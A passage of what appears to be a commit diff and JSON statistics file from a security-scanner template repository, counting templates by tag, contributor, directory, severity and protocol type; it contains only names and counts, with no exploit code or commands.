nkedin","count":1},{"name":"alibaba","count":1},{"name":"klog","count":1},{"name":"jnoj","count":1},{"name":"proftpd","count":1},{"name":"aspnuke","count":1},{"name":"springframework","count":1},{"name":"smartblog","count":1},{"name":"nuuo","count":1},{"name":"jenkin","count":1},{"name":"discord","count":1},{"name":"iceflow","count":1},{"name":"gateone","count":1},{"name":"webadmin","count":1},{"name":"biometrics","count":1},{"name":"duomicms","count":1},{"name":"kerbynet","count":1},{"name":"rdp","count":1},{"name":"setup","count":1},{"name":"xvr","count":1},{"name":"nordex","count":1},{"name":"lighttpd","count":1},{"name":"scs","count":1},{"name":"openvpn","count":1},{"name":"listserv","count":1},{"name":"rfi","count":1},{"name":"labtech","count":1},{"name":"crm","count":1},{"name":"iptime","count":1},{"name":"svnserve","count":1},{"name":"mongo","count":1},{"name":"csrf","count":1},{"name":"ulterius","count":1},{"name":"salesforce","count":1},{"name":"netgenie","count":1},{"name":"cocoon","count":1},{"name":"sarg","count":1},{"name":"interlib","count":1},{"name":"magicflow","count":1},{"name":"sqlite","count":1},{"name":"netrc","count":1},{"name":"plone","count":1},{"name":"zmanda","count":1},{"name":"oscommerce","count":1},{"name":"chevereto","count":1},{"name":"oidc","count":1},{"name":"gespage","count":1},{"name":"wing-ftp","count":1},{"name":"fiori","count":1},{"name":"calendarix","count":1},{"name":"pihole","count":1},{"name":"tika","count":1},{"name":"getsimple","count":1},{"name":"etouch","count":1},{"name":"clockwatch","count":1},{"name":"haproxy","count":1},{"name":"qvisdvr","count":1},{"name":"totaljs","count":1},{"name":"domxss","count":1},{"name":"nps","count":1},{"name":"payara","count":1},{"name":"cloudinary","count":1},{"name":"vnc","count":1},{"name":"gitlist","count":1},{"name":"panabit","count":1},{"name":"rhymix","count":1},{"name":"diris","count":1},{"name":"majordomo2","count":1},{"name":"anchorcms","count":1},{"name":"processmaker","count":1},{"name":"nimble","count":1},{"name":"whm","count":1},{"name":"szhe","count":1},{"name":"blue-ocean","count":1},{"name":"tongda","count":1},{"name":"lancom","count":1},{"name":"fortiweb","count":1},{"name":"sangfor","count":1},{"name":"trane","count":1},{"name":"dbeaver","count":1},{"name":"opm","count":1},{"name":"robomongo","count":1},{"name":"phalcon","count":1},{"name":"werkzeug","count":1},{"name":"octoprint","count":1},{"name":"plugin","count":1},{"name":"artica","count":1},{"name":"wooyun","count":1},{"name":"geddy","count":1},{"name":"krweb","count":1},{"name":"email","count":1},{"name":"tpshop","count":1},{"name":"trilithic","count":1},{"name":"tectuus","count":1},{"name":"vidyo","count":1},{"name":"clockwork","count":1},{"name":"octobercms","count":1},{"name":"burp","count":1},{"name":"alertmanager","count":1},{"name":"cse","count":1},{"name":"nsasg","count":1},{"name":"pyramid","count":1},{"name":"bigbluebutton","count":1},{"name":"webftp","count":1},{"name":"drone","count":1},{"name":"rujjie","count":1},{"name":"idemia","count":1},{"name":"wavlink","count":1},{"name":"circontrorl","count":1},{"name":"gotmls","count":1},{"name":"nweb2fax","count":1},{"name":"enumeration","count":1},{"name":"soar","count":1},{"name":"parentlink","count":1},{"name":"grails","count":1},{"name":"default","count":1},{"name":"monitorr","count":1},{"name":"mongoshake","count":1},{"name":"sourcebans","count":1},{"name":"expn","count":1},{"name":"postgres","count":1},{"name":"argussurveillance","count":1},{"name":"owasp","count":1},{"name":"manageengine","count":1},{"name":"flink","count":1},{"name":"commax","count":1},{"name":"lotuscms","count":1},{"name":"seacms","count":1},{"name":"netmask","count":1},{"name":"tileserver","count":1},{"name":"spidercontrol","count":1},{"name":"apos","count":1},{"name":"tieline","count":1},{"name":"eyelock","count":1},{"name":"ganglia","count":1},{"name":"tracer","count":1},{"name":"panos","count":1},{"name":"ruby","count":1},{"name":"wuzhicms","count":1},{"name":"gloo","count":1},{"name":"zend","count":1},{"name":"rmc","count":1},{"name":"st","count":1},{"name":"chinaunicom","count":1},{"name":"daybyday","count":1},{"name":"cyberoam","count":1},{"name":"fortinet","count":1},{"name":"phpunit","count":1},{"name":"smi","count":1},{"name":"mediumish","count":1},{"name":"shopxo","count":1},{"name":"pcoip","count":1},{"name":"primetek","count":1},{"name":"bookstack","count":1},{"name":"tenda","count":1},{"name":"acontent","count":1},{"name":"metinfo","count":1},{"name":"tensorflow","count":1},{"name":"emc","count":1},{"name":"ecom","count":1},{"name":"heroku","count":1},{"name":"discourse","count":1},{"name":"empirecms","count":1},{"name":"hadoop","count":1},{"name":"dotclear","count":1},{"name":"jitsi","count":1},{"name":"ilo4","count":1},{"name":"eg","count":1},{"name":"redhat","count":1},{"name":"redmine","count":1},{"name":"ruckus","count":1},{"name":"woocomernce","count":1},{"name":"ognl","count":1},{"name":"jeewms","count":1},{"name":"moinmoin","count":1},{"name":"xff","count":1},{"name":"fortigates","count":1},{"name":"tcexam","count":1},{"name":"clickhouse","count":1},{"name":"fastapi","count":1},{"name":"extractor","count":1},{"name":"nifi","count":1},{"name":"wavemaker","count":1},{"name":"weiphp","count":1},{"name":"gridx","count":1},{"name":"fedora","count":1},{"name":"zcms","count":1},{"name":"sentry","count":1},{"name":"codemeter","count":1},{"name":"aruba","count":1},{"name":"smartsense","count":1},{"name":"achecker","count":1},{"name":"sage","count":1},{"name":"spring","count":1},{"name":"plc","count":1},{"name":"saltapi","count":1},{"name":"lg-nas","count":1},{"name":"fuelcms","count":1},{"name":"shiro","count":1},{"name":"websphere","count":1},{"name":"wamp","count":1},{"name":"dom","count":1},{"name":"cloudflare","count":1},{"name":"wildfly","count":1},{"name":"arl","count":1},{"name":"phpinfo","count":1},{"name":"floc","count":1},{"name":"solarlog","count":1},{"name":"tidb","count":1},{"name":"mobileiron","count":1},{"name":"cobub","count":1},{"name":"concrete","count":1},{"name":"pulsesecure","count":1},{"name":"dvwa","count":1},{"name":"optiLink","count":1},{"name":"apiman","count":1},{"name":"finereport","count":1},{"name":"portainer","count":1},{"name":"viewlinc","count":1},{"name":"thinkadmin","count":1},{"name":"cors","count":1},{"name":"redcap","count":1},{"name":"graylog","count":1},{"name":"powercreator","count":1},{"name":"zms","count":1},{"name":"jsp","count":1},{"name":"sgp","count":1},{"name":"gunicorn","count":1},{"name":"linux","count":1},{"name":"miscrsoft","count":1},{"name":"centos","count":1},{"name":"craftcms","count":1},{"name":"mariadb","count":1},{"name":"emby","count":1},{"name":"ricoh","count":1},{"name":"cockpit","count":1},{"name":"cherokee","count":1},{"name":"triconsole","count":1},{"name":"fortilogger","count":1},{"name":"mautic","count":1},{"name":"ueditor","count":1},{"name":"mrtg","count":1},{"name":"openstack","count":1},{"name":"xdcms","count":1},{"name":"expressjs","count":1},{"name":"hortonworks","count":1},{"name":"azkaban","count":1},{"name":"mantis","count":1},{"name":"myvuehelp","count":1},{"name":"lanproxy","count":1},{"name":"opensmtpd","count":1},{"name":"webui","count":1},{"name":"linksys","count":1},{"name":"myucms","count":1},{"name":"xiuno","count":1},{"name":"zte","count":1},{"name":"rabbitmq","count":1},{"name":"k8","count":1},{"name":"servicenow","count":1},{"name":"rubedo","count":1},{"name":"svn","count":1},{"name":"tamronos","count":1},{"name":"landray","count":1},{"name":"subrion","count":1},{"name":"cerebro","count":1},{"name":"exacqvision","count":1},{"name":"exponentcms","count":1},{"name":"websvn","count":1},{"name":"webmodule-ee","count":1},{"name":"ns","count":1},{"name":"timesheet","count":1},{"name":"commscope","count":1}],"authors":[{"name":"dhiyaneshdk","count":252},{"name":"pikpikcu","count":250},{"name":"daffainfo","count":199},{"name":"pdteam","count":195},{"name":"geeknik","count":151},{"name":"dwisiswant0","count":132},{"name":"gy741","count":72},{"name":"madrobot","count":62},{"name":"princechaddha","count":60},{"name":"pussycat0x","count":58},{"name":"gaurang","count":42},{"name":"0x_akoko","count":33},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"philippedelteil","count":23},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"pr3r00t","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"r3dg33k","count":11},{"name":"random_robbie","count":10},{"name":"righettod","count":10},{"name":"wdahlenb","count":10},{"name":"hackergautam","count":9},{"name":"nadino","count":9},{"name":"melbadry9","count":9},{"name":"that_juan_","count":8},{"name":"iamthefrogy","count":8},{"name":"aashiq","count":8},{"name":"oppsec","count":7},{"name":"randomstr1ng","count":7},{"name":"harshbothra_","count":7},{"name":"emadshanab","count":7},{"name":"dr_set","count":7},{"name":"kophjager007","count":7},{"name":"dogasantos","count":7},{"name":"techryptic (@tech)","count":7},{"name":"0x240x23elu","count":7},{"name":"logicalhunter","count":6},{"name":"puzzlepeaches","count":6},{"name":"meme-lord","count":6},{"name":"__fazal","count":6},{"name":"caspergn","count":6},{"name":"joanbono","count":5},{"name":"panch0r3d","count":5},{"name":"pentest_swissky","count":5},{"name":"ganofins","count":5},{"name":"elsfa7110","count":5},{"name":"iamnoooob","count":5},{"name":"yanyun","count":5},{"name":"rootxharsh","count":5},{"name":"xelkomy","count":4},{"name":"nodauf","count":4},{"name":"e_schultze_","count":4},{"name":"lu4nx","count":4},{"name":"github.com/its0x08","count":4},{"name":"yash anand @yashanand155","count":3},{"name":"0w4ys","count":3},{"name":"incogbyte","count":3},{"name":"_generic_human_","count":3},{"name":"z3bd","count":3},{"name":"skeltavik","count":3},{"name":"vsh00t","count":3},{"name":"f1tz","count":3},{"name":"mavericknerd","count":3},{"name":"emenalf","count":3},{"name":"binaryfigments","count":3},{"name":"shifacyclewala","count":3},{"name":"johnk3r","count":3},{"name":"idealphase","count":3},{"name":"thomas_from_offensity","count":3},{"name":"dudez","count":3},{"name":"fyoorer","count":3},{"name":"impramodsargar","count":3},{"name":"tess","count":3},{"name":"jarijaas","count":3},{"name":"shine","count":3},{"name":"foulenzer","count":2},{"name":"zomsop82","count":2},{"name":"dheerajmadhukar","count":2},{"name":"udit_thakkur","count":2},{"name":"g4l1t0","count":2},{"name":"parth","count":2},{"name":"joeldeleep","count":2},{"name":"davidmckennirey","count":2},{"name":"gevakun","count":2},{"name":"0xelkomy","count":2},{"name":"ree4pwn","count":2},{"name":"0xsapra","count":2},{"name":"cocxanh","count":2},{"name":"whoever","count":2},{"name":"huowuzhao","count":2},{"name":"lotusdll","count":2},{"name":"pxmme1337","count":2},{"name":"gal nagli","count":2},{"name":"alifathi-h1","count":2},{"name":"swissky","count":2},{"name":"johnjhacking","count":2},{"name":"r3naissance","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"afaq","count":2},{"name":"fabaff","count":2},{"name":"moritz nentwig","count":2},{"name":"koti2","count":2},{"name":"x1m_martijn","count":2},{"name":"hetroublemakr","count":2},{"name":"random-robbie","count":2},{"name":"bsysop","count":2},{"name":"w4cky_","count":2},{"name":"manas_harsh","count":2},{"name":"amsda","count":2},{"name":"bing0o","count":2},{"name":"unstabl3","count":2},{"name":"randomrobbie","count":2},{"name":"socketz","count":2},{"name":"sushantkamble","count":2},{"name":"vavkamil","count":2},{"name":"bp0lr","count":2},{"name":"0xprial","count":2},{"name":"arcc","count":2},{"name":"0xcrypto","count":2},{"name":"convisoappsec","count":2},{"name":"kiblyn11","count":2},{"name":"hahwul","count":2},{"name":"nkxxkn","count":2},{"name":"0xrudra","count":2},{"name":"mohammedsaneem","count":2},{"name":"ehsahil","count":2},{"name":"0h1in9e","count":1},{"name":"sickwell","count":1},{"name":"ringo","count":1},{"name":"bernardofsr","count":1},{"name":"noamrathaus","count":1},{"name":"mah3sec_","count":1},{"name":"chron0x","count":1},{"name":"absshax","count":1},{"name":"juicypotato1","count":1},{"name":"ilovebinbash","count":1},{"name":"c3l3si4n","count":1},{"name":"ahmed sherif","count":1},{"name":"schniggie","count":1},{"name":"borna nematzadeh","count":1},{"name":"_harleo","count":1},{"name":"intx0x80","count":1},{"name":"j33n1k4","count":1},{"name":"alperenkesk","count":1},{"name":"willd96","count":1},{"name":"undefl0w","count":1},{"name":"cookiehanhoan","count":1},{"name":"@dwisiswant0","count":1},{"name":"remonsec","count":1},{"name":"akshansh","count":1},{"name":"aresx","count":1},{"name":"mhdsamx","count":1},{"name":"zhenwarx","count":1},{"name":"furkansenan","count":1},{"name":"52971","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"sec_hawk","count":1},{"name":"kre80r","count":1},{"name":"me9187","count":1},{"name":"b0yd","count":1},{"name":"makyotox","count":1},{"name":"shifacyclewla","count":1},{"name":"th3.d1p4k","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"sshell","count":1},{"name":"iampritam","count":1},{"name":"_c0wb0y_","count":1},{"name":"hanlaomo","count":1},{"name":"omarkurt","count":1},{"name":"rodnt","count":1},{"name":"berkdusunur","count":1},{"name":"evolutionsec","count":1},{"name":"nytr0gen","count":1},{"name":"affix","count":1},{"name":"b4uh0lz","count":1},{"name":"kabirsuda","count":1},{"name":"kurohost","count":1},{"name":"sullo","count":1},{"name":"knassar702","count":1},{"name":"geraldino2","count":1},{"name":"manuelbua","count":1},{"name":"d0rkerdevil","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"thevillagehacker","count":1},{"name":"yashgoti","count":1},{"name":"philippdelteil","count":1},{"name":"bjhulst","count":1},{"name":"pdp","count":1},{"name":"smaranchand","count":1},{"name":"0ut0fb4nd","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"divya_mudgal","count":1},{"name":"rojanrijal","count":1},{"name":"ohlinge","count":1},{"name":"patralos","count":1},{"name":"jeya seelan","count":1},{"name":"notsoevilweasel","count":1},{"name":"jteles","count":1},{"name":"0xteles","count":1},{"name":"daviey","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"mesaglio","count":1},{"name":"shelld3v","count":1},{"name":"dawid-czarnecki","count":1},{"name":"sy3omda","count":1},{"name":"alph4byt3","count":1},{"name":"ldionmarcil","count":1},{"name":"blckraven","count":1},{"name":"yavolo","count":1},{"name":"defr0ggy","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"mubassirpatel","count":1},{"name":"hakluke","count":1},{"name":"co0nan","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"deena","count":1},{"name":"x6263","count":1},{"name":"raesene","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"adrianmf","count":1},{"name":"izn0u","count":1},{"name":"apt-mirror","count":1},{"name":"thezakman","count":1},{"name":"ooooooo_q","count":1},{"name":"andysvints","count":1},{"name":"luskabol","count":1},{"name":"petruknisme","count":1},{"name":"soyelmago","count":1},{"name":"retr0","count":1},{"name":"infosecsanyam","count":1},{"name":"its0x08","count":1},{"name":"elmahdi","count":1},{"name":"alex","count":1},{"name":"ahmetpergamum","count":1},{"name":"revblock","count":1},{"name":"becivells","count":1},{"name":"elder tao","count":1},{"name":"andirrahmani1","count":1},{"name":"bad5ect0r","count":1},{"name":"tirtha_mandal","count":1},{"name":"bolli95","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"shreyapohekar","count":1},{"name":"tim_koopmans","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"luci","count":1},{"name":"whynotke","count":1},{"name":"micha3lb3n","count":1},{"name":"yashanand155","count":1},{"name":"0xrod","count":1},{"name":"toufik airane","count":1},{"name":"mass0ma","count":1},{"name":"udyz","count":1},{"name":"qlkwej","count":1},{"name":"fmunozs","count":1},{"name":"0xtavian","count":1},{"name":"b0rn2r00t","count":1},{"name":"fopina","count":1},{"name":"gboddin","count":1},{"name":"exploitation","count":1},{"name":"zandros0","count":1},{"name":"push4d","count":1},{"name":"sicksec","count":1},{"name":"ipanda","count":1},{"name":"flag007","count":1},{"name":"akash.c","count":1},{"name":"wabafet","count":1},{"name":"_darrenmartyn","count":1},{"name":"kareemse1im","count":1},{"name":"vzamanillo","count":1},{"name":"regala_","count":1},{"name":"ajaysenr","count":1},{"name":"naglinagli","count":1},{"name":"un-fmunozs","count":1},{"name":"taielab","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"s1r1u5_","count":1},{"name":"pratik khalane","count":1},{"name":"pudsec","count":1},{"name":"streetofhackerr007","count":1}],"directory":[{"name":"cves","count":696},{"name":"vulnerabilities","count":291},{"name":"exposed-panels","count":247},{"name":"exposures","count":186},{"name":"technologies","count":178},{"name":"misconfiguration","count":131},{"name":"takeovers","count":63},{"name":"default-logins","count":56},{"name":"file","count":46},{"name":"workflows","count":36},{"name":"network","count":32},{"name":"miscellaneous","count":24},{"name":"iot","count":23},{"name":"dns","count":11},{"name":"fuzzing","count":9},{"name":"cnvd","count":9},{"name":"headless","count":5}],"severity":[{"name":"info","count":625},{"name":"high","count":540},{"name":"medium","count":428},{"name":"critical","count":267},{"name":"low","count":147}],"types":[{"name":"http","count":1904},{"name":"file","count":46},{"name":"network","count":41},{"name":"dns","count":11}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index a7efc05b55..4f95b9d14a 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,750 +1,799 @@ -| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | -|--------------------|-------|--------------------------------|-------|-------------------------|-------|----------|-------|---------|-------| -| cve | 666 | dhiyaneshdk | 248 | cves | 674 | info | 615 | http | 1859 | -| panel | 236 | pikpikcu | 246 | vulnerabilities | 284 | high | 535 | file | 46 | -| lfi | 228 | pdteam | 198 | exposed-panels | 235 | medium | 413 | network | 39 | -| xss | 225 | daffainfo | 183 | exposures | 186 | critical | 236 | dns | 11 | -| exposure | 221 | geeknik | 150 | technologies | 170 | low | 161 | | | -| wordpress | 206 | dwisiswant0 | 132 | misconfiguration | 129 | | | | | -| rce | 193 | gy741 | 72 | takeovers | 71 | | | | | -| cve2020 | 159 | madrobot | 62 | default-logins | 54 | | | | | -| wp-plugin | 139 | pussycat0x | 55 | file | 46 | | | | | -| cve2021 | 112 | princechaddha | 55 | workflows | 35 | | | | | -| tech | 111 | gaurang | 42 | network | 30 | | | | | -| config | 93 | ice3man | 26 | miscellaneous | 24 | | | | | -| cve2019 | 90 | 0x_akoko | 25 | iot | 23 | | | | | -| cve2018 | 80 | organiccrap | 24 | dns | 11 | | | | | -| takeover | 74 | philippedelteil | 21 | fuzzing | 9 | | | | | -| apache | 66 | sheikhrishad | 15 | cnvd | 9 | | | | | -| | 66 | milo2012 | 14 | headless | 5 | | | | | -| token | 64 | pr3r00t | 13 | .pre-commit-config.yaml | 1 | | | | | -| default-login | 60 | techbrunchfr | 13 | | | | | | | -| joomla | 59 | suman_kar | 12 | | | | | | | -| iot | 58 | cyllective | 11 | | | | | | | -| cve2010 | 51 | r3dg33k | 11 | | | | | | | -| cve2017 | 49 | random_robbie | 10 | | | | | | | -| oob | 48 | righettod | 10 | | | | | | | -| file | 46 | wdahlenb | 9 | | | | | | | -| unauth | 45 | melbadry9 | 9 | | | | | | | -| network | 39 | nadino | 9 | | | | | | | -| sqli | 38 | hackergautam | 9 | | | | | | | -| ssrf | 35 | that_juan_ | 8 | | | | | | | -| cve2016 | 32 | aashiq | 8 | | | | | | | -| oracle | 31 | iamthefrogy | 8 | | | | | | | -| logs | 30 | kophjager007 | 7 | | | | | | | -| workflow | 30 | techryptic (@tech) | 7 | | | | | | | -| redirect | 28 | randomstr1ng | 7 | | | | | | | -| jira | 28 | dogasantos | 7 | | | | | | | -| atlassian | 27 | emadshanab | 7 | | | | | | | -| listing | 25 | dr_set | 7 | | | | | | | -| misc | 23 | 0x240x23elu | 7 | | | | | | | -| cve2015 | 20 | harshbothra_ | 7 | | | | | | | -| disclosure | 20 | oppsec | 7 | | | | | | | -| cisco | 19 | meme-lord | 6 | | | | | | | -| generic | 19 | logicalhunter | 6 | | | | | | | -| aem | 19 | puzzlepeaches | 6 | | | | | | | -| router | 19 | caspergn | 6 | | | | | | | -| sap | 18 | __fazal | 6 | | | | | | | -| auth-bypass | 17 | ganofins | 5 | | | | | | | -| springboot | 16 | elsfa7110 | 5 | | | | | | | -| debug | 15 | yanyun | 5 | | | | | | | -| cve2014 | 15 | joanbono | 5 | | | | | | | -| misconfig | 14 | panch0r3d | 5 | | | | | | | -| cve2012 | 14 | rootxharsh | 5 | | | | | | | -| cve2011 | 13 | pentest_swissky | 5 | | | | | | | -| struts | 13 | iamnoooob | 5 | | | | | | | -| php | 13 | xelkomy | 4 | | | | | | | -| adobe | 13 | e_schultze_ | 4 | | | | | | | -| fuzz | 13 | github.com/its0x08 | 4 | | | | | | | -| android | 13 | nodauf | 4 | | | | | | | -| weblogic | 12 | thomas_from_offensity | 3 | | | | | | | -| devops | 12 | impramodsargar | 3 | | | | | | | -| dlink | 12 | emenalf | 3 | | | | | | | -| dns | 12 | incogbyte | 3 | | | | | | | -| jenkins | 12 | 0w4ys | 3 | | | | | | | -| cve2013 | 11 | mavericknerd | 3 | | | | | | | -| zoho | 11 | shine | 3 | | | | | | | -| magento | 9 | f1tz | 3 | | | | | | | -| xxe | 9 | binaryfigments | 3 | | | | | | | -| ftp | 9 | fyoorer | 3 | | | | | | | -| aws | 9 | vsh00t | 3 | | | | | | | -| ruijie | 8 | lu4nx | 3 | | | | | | | -| scada | 8 | z3bd | 3 | | | | | | | -| login | 8 | dudez | 3 | | | | | | | -| cnvd | 8 | jarijaas | 3 | | | | | | | -| gitlab | 8 | shifacyclewala | 3 | | | | | | | -| airflow | 8 | tess | 3 | | | | | | | -| rails | 8 | _generic_human_ | 3 | | | | | | | -| cms | 7 | yash anand @yashanand155 | 3 | | | | | | | -| kubernetes | 7 | hahwul | 2 | | | | | | | -| nginx | 7 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| netgear | 7 | swissky | 2 | | | | | | | -| cve2009 | 7 | 0xprial | 2 | | | | | | | -| files | 7 | w4cky_ | 2 | | | | | | | -| backup | 7 | 0xcrypto | 2 | | | | | | | -| coldfusion | 7 | 0xrudra | 2 | | | | | | | -| vmware | 7 | cocxanh | 2 | | | | | | | -| google | 6 | gal nagli | 2 | | | | | | | -| api | 6 | lotusdll | 2 | | | | | | | -| solr | 6 | koti2 | 2 | | | | | | | -| cve2008 | 6 | fabaff | 2 | | | | | | | -| django | 6 | pxmme1337 | 2 | | | | | | | -| dell | 6 | udit_thakkur | 2 | | | | | | | -| rconfig | 6 | random-robbie | 2 | | | | | | | -| jetty | 6 | unstabl3 | 2 | | | | | | | -| docker | 6 | ree4pwn | 2 | | | | | | | -| laravel | 6 | johnjhacking | 2 | | | | | | | -| citrix | 6 | dheerajmadhukar | 2 | | | | | | | -| confluence | 6 | 0xsapra | 2 | | | | | | | -| windows | 5 | afaq | 2 | | | | | | | -| circarlife | 5 | foulenzer | 2 | | | | | | | -| drupal | 5 | 0xelkomy | 2 | | | | | | | -| headless | 5 | bp0lr | 2 | | | | | | | -| lucee | 5 | moritz nentwig | 2 | | | | | | | -| microsoft | 5 | arcc | 2 | | | | | | | -| fileupload | 5 | bsysop | 2 | | | | | | | -| java | 5 | hetroublemakr | 2 | | | | | | | -| nodejs | 5 | randomrobbie | 2 | | | | | | | -| ssti | 5 | huowuzhao | 2 | | | | | | | -| printer | 5 | nkxxkn | 2 | | | | | | | -| phpmyadmin | 5 | kiblyn11 | 2 | | | | | | | -| iis | 5 | socketz | 2 | | | | | | | -| wp-theme | 5 | davidmckennirey | 2 | | | | | | | -| dedecms | 5 | gevakun | 2 | | | | | | | -| ibm | 5 | joeldeleep | 2 | | | | | | | -| hongdian | 4 | zomsop82 | 2 | | | | | | | -| magmi | 4 | mohammedsaneem | 2 | | | | | | | -| crlf | 4 | amsda | 2 | | | | | | | -| samsung | 4 | ehsahil | 2 | | | | | | | -| wso2 | 4 | whoever | 2 | | | | | | | -| solarwinds | 4 | bing0o | 2 | | | | | | | -| vpn | 4 | vavkamil | 2 | | | | | | | -| traversal | 4 | sushantkamble | 2 | | | | | | | -| artifactory | 4 | r3naissance | 2 | | | | | | | -| deserialization | 4 | convisoappsec | 2 | | | | | | | -| tomcat | 4 | g4l1t0 | 2 | | | | | | | -| firmware | 4 | x1m_martijn | 2 | | | | | | | -| zimbra | 4 | alifathi-h1 | 2 | | | | | | | -| thinkphp | 4 | manas_harsh | 2 | | | | | | | -| jolokia | 4 | parth | 2 | | | | | | | -| glpi | 4 | kurohost | 1 | | | | | | | -| grafana | 4 | ldionmarcil | 1 | | | | | | | -| elastic | 4 | notsoevilweasel | 1 | | | | | | | -| exchange | 4 | luskabol | 1 | | | | | | | -| asp | 4 | c3l3si4n | 1 | | | | | | | -| buffalo | 4 | zandros0 | 1 | | | | | | | -| thinkcmf | 4 | udyz | 1 | | | | | | | -| hp | 4 | sickwell | 1 | | | | | | | -| symfony | 4 | b4uh0lz | 1 | | | | | | | -| webserver | 4 | akshansh | 1 | | | | | | | -| moodle | 4 | j3ssie/geraldino2 | 1 | | | | | | | -| zhiyuan | 3 | deena | 1 | | | | | | | -| ebs | 3 | revblock | 1 | | | | | | | -| fpd | 3 | hanlaomo | 1 | | | | | | | -| lfr | 3 | mah3sec_ | 1 | | | | | | | -| resin | 3 | akash.c | 1 | | | | | | | -| caucho | 3 | defr0ggy | 1 | | | | | | | -| mongodb | 3 | elder tao | 1 | | | | | | | -| ofbiz | 3 | divya_mudgal | 1 | | | | | | | -| openssh | 3 | x6263 | 1 | | | | | | | -| fanruan | 3 | _c0wb0y_ | 1 | | | | | | | -| opensis | 3 | me9187 | 1 | | | | | | | -| git | 3 | @dwisiswant0 | 1 | | | | | | | -| amazon | 3 | ohlinge | 1 | | | | | | | -| oa | 3 | regala_ | 1 | | | | | | | -| terramaster | 3 | mass0ma | 1 | | | | | | | -| nacos | 3 | evolutionsec | 1 | | | | | | | -| nosqli | 3 | johnk3r | 1 | | | | | | | -| targa | 3 | co0nan | 1 | | | | | | | -| vbulletin | 3 | daviey | 1 | | | | | | | -| intrusive | 3 | berkdusunur | 1 | | | | | | | -| zabbix | 3 | 0xtavian | 1 | | | | | | | -| slack | 3 | th3.d1p4k | 1 | | | | | | | -| r-seenet | 3 | shifacyclewla | 1 | | | | | | | -| microstrategy | 3 | bjhulst | 1 | | | | | | | -| ssh | 3 | omarkurt | 1 | | | | | | | -| httpd | 3 | fmunozs | 1 | | | | | | | -| itop | 3 | mesaglio | 1 | | | | | | | -| log | 3 | sicksec | 1 | | | | | | | -| kevinlab | 3 | kabirsuda | 1 | | | | | | | -| kafka | 3 | iampritam | 1 | | | | | | | -| bitrix | 3 | _harleo | 1 | | | | | | | -| backups | 3 | ipanda | 1 | | | | | | | -| springcloud | 3 | sy3omda | 1 | | | | | | | -| nexus | 3 | aceseven (digisec360) | 1 | | | | | | | -| tikiwiki | 3 | bernardofsr | 1 | | | | | | | -| bypass | 3 | toufik airane | 1 | | | | | | | -| couchdb | 2 | yashanand155 | 1 | | | | | | | -| cve2005 | 2 | mubassirpatel | 1 | | | | | | | -| flir | 2 | streetofhackerr007 | 1 | | | | | | | -| natshell | 2 | ilovebinbash | 1 | | | | | | | -| mida | 2 | skeltavik | 1 | | | | | | | -| nagios | 2 | un-fmunozs | 1 | | | | | | | -| npm | 2 | 0ut0fb4nd | 1 | | | | | | | -| splunk | 2 | its0x08 | 1 | | | | | | | -| guacamole | 2 | zhenwarx | 1 | | | | | | | -| yapi | 2 | exploitation | 1 | | | | | | | -| maian | 2 | rtcms | 1 | | | | | | | -| waf | 2 | smaranchand | 1 | | | | | | | -| sonicwall | 2 | alperenkesk | 1 | | | | | | | -| cve2007 | 2 | thevillagehacker | 1 | | | | | | | -| jeedom | 2 | aresx | 1 | | | | | | | -| geowebserver | 2 | luci | 1 | | | | | | | -| status | 2 | adrianmf | 1 | | | | | | | -| plesk | 2 | knassar702 | 1 | | | | | | | -| prometheus | 2 | kre80r | 1 | | | | | | | -| globalprotect | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| seeyon | 2 | andysvints | 1 | | | | | | | -| keycloak | 2 | d0rkerdevil | 1 | | | | | | | -| frp | 2 | noamrathaus | 1 | | | | | | | -| telerik | 2 | pudsec | 1 | | | | | | | -| github | 2 | kishore krishna (sillydaddy) | 1 | | | | | | | -| akkadian | 2 | 52971 | 1 | | | | | | | -| smb | 2 | yashgoti | 1 | | | | | | | -| prestashop | 2 | blckraven | 1 | | | | | | | -| chiyu | 2 | jteles | 1 | | | | | | | -| leak | 2 | nytr0gen | 1 | | | | | | | -| avantfax | 2 | streetofhackerr007 (rohit | 1 | | | | | | | -| | | soni) | | | | | | | | -| dolibarr | 2 | alph4byt3 | 1 | | | | | | | -| openfire | 2 | undefl0w | 1 | | | | | | | -| spark | 2 | vzamanillo | 1 | | | | | | | -| oauth | 2 | idealphase | 1 | | | | | | | -| ec2 | 2 | shelld3v | 1 | | | | | | | -| jboss | 2 | pratik khalane | 1 | | | | | | | -| rockethchat | 2 | sshell | 1 | | | | | | | -| node | 2 | cookiehanhoan | 1 | | | | | | | -| wordfence | 2 | kba@sogeti_esec | 1 | | | | | | | -| openam | 2 | retr0 | 1 | | | | | | | -| icewarp | 2 | _darrenmartyn | 1 | | | | | | | -| sharepoint | 2 | apt-mirror | 1 | | | | | | | -| mail | 2 | abison_binoy | 1 | | | | | | | -| axis2 | 2 | remonsec | 1 | | | | | | | -| proxy | 2 | 0xteles | 1 | | | | | | | -| grav | 2 | hakluke | 1 | | | | | | | -| rockmongo | 2 | alex | 1 | | | | | | | -| firebase | 2 | affix | 1 | | | | | | | -| saltstack | 2 | infosecsanyam | 1 | | | | | | | -| service | 2 | juicypotato1 | 1 | | | | | | | -| jellyfin | 2 | dawid-czarnecki | 1 | | | | | | | -| trixbox | 2 | @github.com/defr0ggy | 1 | | 